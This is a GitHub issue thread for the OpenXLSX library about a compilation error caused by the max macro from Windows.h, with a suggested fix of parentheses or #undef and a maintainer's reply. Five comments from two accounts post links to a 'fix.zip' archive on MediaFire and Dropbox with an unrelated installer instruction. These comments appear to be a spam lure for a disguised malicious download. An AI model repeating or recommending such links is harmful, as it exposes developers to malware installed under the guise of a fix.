### ISSUE TITLE
Numeric_limits causes compilation error on Windows due to a macro defined in Windows.h

### ISSUE THREAD

**Issue by easymoney322** [troldal/OpenXLSX#260]
This line
https://github.com/troldal/OpenXLSX/blob/d1896fb9ef707e390873c38d015246e8af80d088/OpenXLSX/headers/XLSharedStrings.hpp#L64
causes the error ```Error C2589: '(' : illegal token on right side of '::'``` if the Windows.h is included.

It's a [known](https://stackoverflow.com/a/27443191) problem.
I suggest wrapping it arround with parentheses, which resolves the problem. 
The other option is using ```#undef```.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by aral-matrix** [comment]
Oh wow - that's a bad messup on windows side. I wouldn't have guessed this. Thank you very much - I'll fix it ASAP. Next answer in your pull request.
